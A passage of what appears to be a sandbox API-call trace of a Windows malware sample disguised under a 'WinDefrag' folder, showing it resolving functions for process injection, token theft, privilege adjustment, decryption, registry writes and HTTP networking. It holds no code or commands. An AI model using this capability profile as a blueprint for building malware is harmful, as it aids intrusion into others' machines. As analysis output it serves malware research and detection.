BaseAddress=0x7feffd80000, Name=0x0, Ordinal=0x8, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7feffd813f0) returned 0x0 [0140.819] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.819] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.909] LdrGetProcedureAddress (in: BaseAddress=0x7feffd80000, Name=0x0, Ordinal=0x9, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7feffd81180) returned 0x0 [0140.909] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.909] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.910] LdrGetProcedureAddress (in: BaseAddress=0x7feffd80000, Name=0x0, Ordinal=0x4, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7feffd81040) returned 0x0 [0140.910] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.910] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.912] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="CRYPT32.dll", BaseAddress=0x20027 | out: BaseAddress=0x20027*=0x7fefddf0000) returned 0x0 [0140.914] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.914] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.916] LdrGetProcedureAddress (in: BaseAddress=0x7fefddf0000, Name="CryptStringToBinaryA", Ordinal=0x0, ProcedureAddress=0x20025 | out: ProcedureAddress=0x20025*=0x7fefde3e59c) returned 0x0 [0140.916] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.916] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.918] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WINHTTP.dll", BaseAddress=0x20027 | out: BaseAddress=0x20027*=0x7fef7200000) returned 0x0 [0140.922] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.922] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.924] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpQueryHeaders", Ordinal=0x0, ProcedureAddress=0x20024 | out: ProcedureAddress=0x20024*=0x7fef720c4ac) returned 0x0 [0140.924] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.924] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.926] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpCloseHandle", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x7fef72022e0) returned 0x0 [0140.926] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.926] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.928] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpQueryDataAvailable", Ordinal=0x0, ProcedureAddress=0x2002a | out: ProcedureAddress=0x2002a*=0x7fef721dcfc) returned 0x0 [0140.928] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.928] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.930] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpOpen", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7fef7203428) returned 0x0 [0140.930] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.930] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.932] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpReceiveResponse", Ordinal=0x0, ProcedureAddress=0x20027 | out: ProcedureAddress=0x20027*=0x7fef720d068) returned 0x0 [0140.932] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.932] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.934] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpSendRequest", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x7fef72074d0) returned 0x0 [0140.934] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.934] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.936] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpSetOption", Ordinal=0x0, ProcedureAddress=0x20021 | out: ProcedureAddress=0x20021*=0x7fef72039c4) returned 0x0 [0140.936] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.936] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.938] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpOpenRequest", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x7fef72045f8) returned 0x0 [0140.938] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.938] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.940] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpSetTimeouts", Ordinal=0x0, ProcedureAddress=0x20023 | out: ProcedureAddress=0x20023*=0x7fef720ec64) returned 0x0 [0140.940] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.940] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.942] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpConnect", Ordinal=0x0, ProcedureAddress=0x2001f | out: ProcedureAddress=0x2001f*=0x7fef7213e3c) returned 0x0 [0140.942] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.942] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.944] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpReadData", Ordinal=0x0, ProcedureAddress=0x20020 | out: ProcedureAddress=0x20020*=0x7fef720e1e0) returned 0x0 [0140.944] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.944] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.946] LdrGetProcedureAddress (in: BaseAddress=0x7fef7200000, Name="WinHttpCrackUrl", Ordinal=0x0, ProcedureAddress=0x20020 | out: ProcedureAddress=0x20020*=0x7fef720ba38) returned 0x0 [0140.946] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.946] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.948] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WS2_32.dll", BaseAddress=0x20025 | out: BaseAddress=0x20025*=0x7fefee30000) returned 0x0 [0140.951] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.951] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0140.953] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x74, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee34cc0) returned 0x0 [0140.953] NtClearEvent (EventHandle=0x8) returned 0x0 [0140.953] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.010] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name="getaddrinfo", Ordinal=0x0, ProcedureAddress=0x2001c | out: ProcedureAddress=0x2001c*=0x7fefee32720) returned 0x0 [0141.010] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.010] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.012] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name="freeaddrinfo", Ordinal=0x0, ProcedureAddress=0x2001d | out: ProcedureAddress=0x2001d*=0x7fefee32640) returned 0x0 [0141.012] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.012] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.014] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x39, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3ae20) returned 0x0 [0141.014] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.014] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.015] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x9, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee31250) returned 0x0 [0141.016] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.016] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.017] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x8, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3e270) returned 0x0 [0141.017] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.017] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.019] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0xc, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3d9a0) returned 0x0 [0141.019] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.019] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.020] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x5, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee5e450) returned 0x0 [0141.020] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.020] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.022] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x13, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee38000) returned 0x0 [0141.022] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.022] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.023] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x3, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee318e0) returned 0x0 [0141.024] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.024] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.025] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x17, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3de90) returned 0x0 [0141.025] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.025] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.027] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x10, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3df40) returned 0x0 [0141.027] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.027] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.028] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x15, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee3dd30) returned 0x0 [0141.028] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.028] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.030] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0xb, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee31350) returned 0x0 [0141.030] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.030] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.032] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x4, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee345c0) returned 0x0 [0141.032] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.032] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.033] LdrGetProcedureAddress (in: BaseAddress=0x7fefee30000, Name=0x0, Ordinal=0x73, ProcedureAddress=0x20000 | out: ProcedureAddress=0x20000*=0x7fefee34980) returned 0x0 [0141.033] NtClearEvent (EventHandle=0x8) returned 0x0 [0141.033] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x0) returned 0x0 [0141.037] NtSignalAndWaitForSingleObject (SignalObject=0x4, WaitObject=0x8, Alertable=0, Time=0x18ff20) returned 0x102 [0141.037] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fe90 | out: lpSystemTimeAsFileTime=0x18fe90*(dwLowDateTime=0xf3836260, dwHighDateTime=0x1d48db2)) [0141.037] GetCurrentProcessId () returned 0x980 [0141.037] GetCurrentThreadId () returned 0x9a0 [0141.037] GetTickCount () returned 0x2edf6 [0141.037] QueryPerformanceCounter (in: lpPerformanceCount=0x18fe98 | out: lpPerformanceCount=0x18fe98*=1820866100000) returned 1 [0141.037] GetStartupInfoW (in: lpStartupInfo=0x18fe40 | out: lpStartupInfo=0x18fe40*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d48db2f3836260, hStdOutput=0x1a7f413bb20, hStdError=0xe0000)) [0141.037] GetModuleHandleW (lpModuleName=0x0) returned 0x140000000 [0141.037] __set_app_type (_Type=0x2) [0141.037] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140029698) returned 0x0 [0141.037] __wgetmainargs (in: _Argc=0x140033508, _Argv=0x140033518, _Env=0x140033510, _DoWildCard=0, _StartInfo=0x140033524 | out: _Argc=0x140033508, _Argv=0x140033518, _Env=0x140033510) returned 0 [0141.038] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77b20000 [0141.038] GetProcAddress (hModule=0x77b20000, lpProcName="CreateThread") returned 0x77b36580 [0141.038] GetProcAddress (hModule=0x77b20000, lpProcName="GetComputerNameW") returned 0x77b2d130 [0141.038] GetProcAddress (hModule=0x77b20000, lpProcName="lstrcmpW") returned 0x77b3d9c0 [0141.038] GetProcAddress (hModule=0x77b20000, lpProcName="lstrlenW") returned 0x77b33ec0 [0141.038] GetProcAddress (hModule=0x77b20000, lpProcName="GetFullPathNameW") returned 0x77b376e0 [0141.038] GetProcAddress (hModule=0x77b20000, lpProcName="FindFirstFileW") returned 0x77b3bd80 [0141.038] GetProcAddress (hModule=0x77b20000, lpProcName="FindResourceW") returned 0x77b39b50 [0141.038] GetProcAddress (hModule=0x77b20000, lpProcName="FreeLibrary") returned 0x77b36620 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="LoadResource") returned 0x77b398c0 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="GetModuleHandleW") returned 0x77b43730 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="SetFileTime") returned 0x77b33880 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="lstrcpynW") returned 0x77b6bab0 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="GetLastError") returned 0x77b42dd0 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="FindClose") returned 0x77b3bd60 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="LockResource") returned 0x77b28720 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="GetSystemInfo") returned 0x77b36f70 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="FindNextFileW") returned 0x77b31910 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="GetFileTime") returned 0x77b24f80 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="LoadLibraryA") returned 0x77b37070 [0141.039] GetProcAddress (hModule=0x77b20000, lpProcName="lstrcmpA") returned 0x77b81230 [0141.040] GetProcAddress (hModule=0x77b20000, lpProcName="SetFileAttributesW") returned 0x77b337a0 [0141.040] GetProcAddress (hModule=0x77b20000, lpProcName="CreateDirectoryW") returned 0x77b2ad70 [0141.040] GetProcAddress (hModule=0x77b20000, lpProcName="WaitForSingleObject") returned 0x77b42b20 [0141.040] GetProcAddress (hModule=0x77b20000, lpProcName="SignalObjectAndWait") returned 0x77b92c90 [0141.040] GetProcAddress (hModule=0x77b20000, lpProcName="SetEvent") returned 0x77b33f00 [0141.040] GetProcAddress (hModule=0x77b20000, lpProcName="CreateRemoteThread") returned 0x77b6c4f0 [0141.040] GetProcAddress (hModule=0x77b20000, lpProcName="OpenProcess") returned 0x77b3cad0 [0141.040] GetProcAddress (hModule=0x77b20000, lpProcName="VirtualFreeEx") returned 0x77b6bb90 [0141.040] GetProcAddress (hModule=0x77b20000, lpProcName="ReadProcessMemory") returned 0x77b6bdc0 [0141.040] GetProcAddress (hModule=0x77b20000, lpProcName="TerminateProcess") returned 0x77b6bca0 [0141.040] GetProcAddress (hModule=0x77b20000, lpProcName="VirtualProtectEx") returned 0x77b6bb70 [0141.041] GetProcAddress (hModule=0x77b20000, lpProcName="VirtualAllocEx") returned 0x77b6bbd0 [0141.041] GetProcAddress (hModule=0x77b20000, lpProcName="ResetEvent") returned 0x77b2d9a0 [0141.041] GetProcAddress (hModule=0x77b20000, lpProcName="GetExitCodeThread") returned 0x77b31130 [0141.041] GetProcAddress (hModule=0x77b20000, lpProcName="CreateEventW") returned 0x77b35290 [0141.041] GetProcAddress (hModule=0x77b20000, lpProcName="DuplicateHandle") returned 0x77b35d10 [0141.041] GetProcAddress (hModule=0x77b20000, lpProcName="WriteProcessMemory") returned 0x77b6bad0 [0141.041] GetProcAddress (hModule=0x77b20000, lpProcName="ResumeThread") returned 0x77b313a0 [0141.041] GetProcAddress (hModule=0x77b20000, lpProcName="CreateMutexW") returned 0x77b313c0 [0141.041] GetProcAddress (hModule=0x77b20000, lpProcName="LocalFree") returned 0x77b347a0 [0141.041] GetProcAddress (hModule=0x77b20000, lpProcName="lstrcpyW") returned 0x77b6e0d0 [0141.041] GetProcAddress (hModule=0x77b20000, lpProcName="DeleteFileW") returned 0x77b2ad90 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="SetCurrentDirectoryW") returned 0x77b3cab0 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="EnterCriticalSection") returned 0x77c92fc0 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="MoveFileW") returned 0x77baf7f0 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="GetTempPathW") returned 0x77b82040 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="GetStartupInfoW") returned 0x77b38070 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="GetModuleFileNameW") returned 0x77b37700 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="GetFileAttributesW") returned 0x77b3bdd0 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="LeaveCriticalSection") returned 0x77c93000 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="Sleep") returned 0x77b42b70 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x77b364e0 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="GetTickCount") returned 0x77b42b00 [0141.042] GetProcAddress (hModule=0x77b20000, lpProcName="MoveFileExW") returned 0x77b23060 [0141.043] GetProcAddress (hModule=0x77b20000, lpProcName="CreateProcessW") returned 0x77b41bb0 [0141.043] GetProcAddress (hModule=0x77b20000, lpProcName="GetTempFileNameW") returned 0x77b6c030 [0141.043] GetProcAddress (hModule=0x77b20000, lpProcName="lstrcmpiW") returned 0x77b31930 [0141.043] GetProcAddress (hModule=0x77b20000, lpProcName="CreateFileW") returned 0x77b31870 [0141.043] GetProcAddress (hModule=0x77b20000, lpProcName="ReadFile") returned 0x77b31500 [0141.043] GetProcAddress (hModule=0x77b20000, lpProcName="WriteFile") returned 0x77b435a0 [0141.043] GetProcAddress (hModule=0x77b20000, lpProcName="SetFilePointer") returned 0x77b31150 [0141.043] GetProcAddress (hModule=0x77b20000, lpProcName="GetVersion") returned 0x77b301d0 [0141.043] GetProcAddress (hModule=0x77b20000, lpProcName="CloseHandle") returned 0x77b42f80 [0141.044] GetProcAddress (hModule=0x77b20000, lpProcName="GetVersionExW") returned 0x77b2d910 [0141.044] GetProcAddress (hModule=0x77b20000, lpProcName="GetCurrentProcess") returned 0x77b35cf0 [0141.044] GetProcAddress (hModule=0x77b20000, lpProcName="GetSystemTimeAsFileTime") returned 0x77b33f40 [0141.044] GetProcAddress (hModule=0x77b20000, lpProcName="GetCurrentProcessId") returned 0x77b35a50 [0141.044] GetProcAddress (hModule=0x77b20000, lpProcName="lstrlenA") returned 0x77b3caf0 [0141.044] GetProcAddress (hModule=0x77b20000, lpProcName="UnhandledExceptionFilter") returned 0x77bb9330 [0141.044] GetProcAddress (hModule=0x77b20000, lpProcName="SetUnhandledExceptionFilter") returned 0x77b39b70 [0141.044] GetProcAddress (hModule=0x77b20000, lpProcName="GetCurrentThreadId") returned 0x77b33ee0 [0141.044] GetProcAddress (hModule=0x77b20000, lpProcName="QueryPerformanceCounter") returned 0x77b36500 [0141.045] GetProcAddress (hModule=0x77b20000, lpProcName="GetModuleHandleA") returned 0x77b365e0 [0141.045] GetProcAddress (hModule=0x77b20000, lpProcName="WideCharToMultiByte") returned 0x77b435f0 [0141.045] GetProcAddress (hModule=0x77b20000, lpProcName="MultiByteToWideChar") returned 0x77b35b50 [0141.045] GetProcAddress (hModule=0x77b20000, lpProcName="Process32FirstW") returned 0x77b21e00 [0141.045] GetProcAddress (hModule=0x77b20000, lpProcName="Process32NextW") returned 0x77b220f0 [0141.045] GetProcAddress (hModule=0x77b20000, lpProcName="CreateToolhelp32Snapshot") returned 0x77b221e0 [0141.045] LoadLibraryW (lpLibFileName="ADVAPI32.dll") returned 0x7feff0e0000 [0141.045] GetProcAddress (hModule=0x7feff0e0000, lpProcName="GetUserNameW") returned 0x7feff0f1fd0 [0141.045] GetProcAddress (hModule=0x7feff0e0000, lpProcName="GetTokenInformation") returned 0x7feff0fbd50 [0141.046] GetProcAddress (hModule=0x7feff0e0000, lpProcName="LookupAccountSidW") returned 0x7feff0fb898 [0141.046] GetProcAddress (hModule=0x7feff0e0000, lpProcName="DuplicateTokenEx") returned 0x7feff0ed310 [0141.046] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CreateProcessAsUserW") returned 0x7feff0eafe8 [0141.046] GetProcAddress (hModule=0x7feff0e0000, lpProcName="EqualSid") returned 0x7feff0fb820 [0141.046] GetProcAddress (hModule=0x7feff0e0000, lpProcName="OpenProcessToken") returned 0x7feff0fbd70 [0141.046] GetProcAddress (hModule=0x7feff0e0000, lpProcName="FreeSid") returned 0x7feff0fb818 [0141.046] GetProcAddress (hModule=0x7feff0e0000, lpProcName="AllocateAndInitializeSid") returned 0x7feff0fb63c [0141.046] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptDestroyKey") returned 0x7feff0eafa0 [0141.047] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptHashData") returned 0x7feff0edac0 [0141.047] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptDestroyHash") returned 0x7feff0edb00 [0141.047] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptDecrypt") returned 0x7feff11b6d0 [0141.047] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptCreateHash") returned 0x7feff0edad4 [0141.047] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptImportKey") returned 0x7feff0eaf6c [0141.047] GetProcAddress (hModule=0x7feff0e0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x7feff0f2040 [0141.047] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptReleaseContext") returned 0x7feff0edd10 [0141.047] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptSetKeyParam") returned 0x7feff11b508 [0141.048] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptAcquireContextW") returned 0x7feff0ed98c [0141.048] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CryptGetHashParam") returned 0x7feff0edb20 [0141.048] GetProcAddress (hModule=0x7feff0e0000, lpProcName="LookupPrivilegeValueW") returned 0x7feff0fb9e0 [0141.048] GetProcAddress (hModule=0x7feff0e0000, lpProcName="AdjustTokenPrivileges") returned 0x7feff0fb9b0 [0141.048] GetProcAddress (hModule=0x7feff0e0000, lpProcName="RevertToSelf") returned 0x7feff0edd00 [0141.048] GetProcAddress (hModule=0x7feff0e0000, lpProcName="RegCreateKeyExW") returned 0x7feff0fb520 [0141.048] GetProcAddress (hModule=0x7feff0e0000, lpProcName="RegCloseKey") returned 0x7feff100710 [0141.048] GetProcAddress (hModule=0x7feff0e0000, lpProcName="RegOpenKeyExW") returned 0x7feff1006f0 [0141.048] GetProcAddress (hModule=0x7feff0e0000, lpProcName="RegSetValueExW") returned 0x7feff0f1ed0 [0141.049] GetProcAddress (hModule=0x7feff0e0000, lpProcName="SetNamedSecurityInfoW") returned 0x7feff0e89a0 [0141.049] GetProcAddress (hModule=0x7feff0e0000, lpProcName="SetSecurityInfo") returned 0x7feff0e8420 [0141.049] GetProcAddress (hModule=0x7feff0e0000, lpProcName="GetSecurityInfo") returned 0x7feff0ea8e0 [0141.049] GetProcAddress (hModule=0x7feff0e0000, lpProcName="SetEntriesInAclW") returned 0x7feff0f3540 [0141.049] GetProcAddress (hModule=0x7feff0e0000, lpProcName="GetLengthSid") returned 0x7feff0fb580 [0141.049] GetProcAddress (hModule=0x7feff0e0000, lpProcName="CopySid") returned 0x7feff0fbda0 [0141.049] GetProcAddress (hModule=0x7feff0e0000, lpProcName="InitializeSecurityDescriptor") returned 0x7feff0fb504 [0141.049] GetProcAddress (hModule=0x7feff0e0000, lpProcName="SetSecurityDescriptorDacl") returned 0x7feff0fb5a0 [0141.049] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7feffa40000 [0141.050] GetProcAddress (hModule=0x7feffa40000, lpProcName="CoCreateInstance") returned 0x7feffa67490 [0141.050] GetProcAddress (hModule=0x7feffa40000, lpProcName="CoUninitialize") returned 0x7feffa61314 [0141.050] LoadLibraryW (lpLibFileName="CRYPT32.dll") returned 0x7fefddf0000 [0141.050] GetProcAddress (hModule=0x7fefddf0000, lpProcName="CryptStringToBinaryW") returned 0x7fefde3e9a0 [0141.050] GetProcAddress (hModule=0x7fefddf0000, lpProcName="CryptBinaryToStringW") returned 0x7fefde24198 [0141.050] LoadLibraryW (lpLibFileName="SHLWAPI.dll") returned 0x7feff640000 [0141.051] GetProcAddress (hModule=0x7feff640000, lpProcName="PathFindFileNameW") returned 0x7feff653920 [0141.051] GetProcAddress (hModule=0x7feff640000, lpProcName="PathAddBackslashW") returned 0x7feff653f70 [0141.051] GetProcAddress (hModule=0x7feff640000, lpProcName="PathRenameExtensionW") returned 0x7feff66e6c0 [0141.051] GetProcAddress (hModule=0x7feff640000, lpProcName="StrStrIW") returned 0x7feff64fb70 [0141.051] GetProcAddress (hModule=0x7feff640000, lpProcName="PathRemoveBackslashW") returned 0x7feff64d014 [0141.051] GetProcAddress (hModule=0x7feff640000, lpProcName="PathRemoveFileSpecW") returned 0x7feff64a43c [0141.052] GetProcAddress (hModule=0x7feff640000, lpProcName="PathFindExtensionW") returned 0x7feff652b00 [0141.052] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77c40000 [0141.052] GetProcAddress (hModule=0x77c40000, lpProcName="NtQueryInformationProcess") returned 0x77c914a0 [0141.052] LoadLibraryW (lpLibFileName="IPHLPAPI.dll") returned 0x7fefb680000 [0141.055] GetProcAddress (hModule=0x7fefb680000, lpProcName="GetAdaptersInfo") returned 0x7fefb68792c [0141.055] LoadLibraryW (lpLibFileName="USERENV.dll") returned 0x7fefcf30000 [0141.057] GetProcAddress (hModule=0x7fefcf30000, lpProcName="CreateEnvironmentBlock") returned 0x7fefcf310b0 [0141.057] GetProcAddress 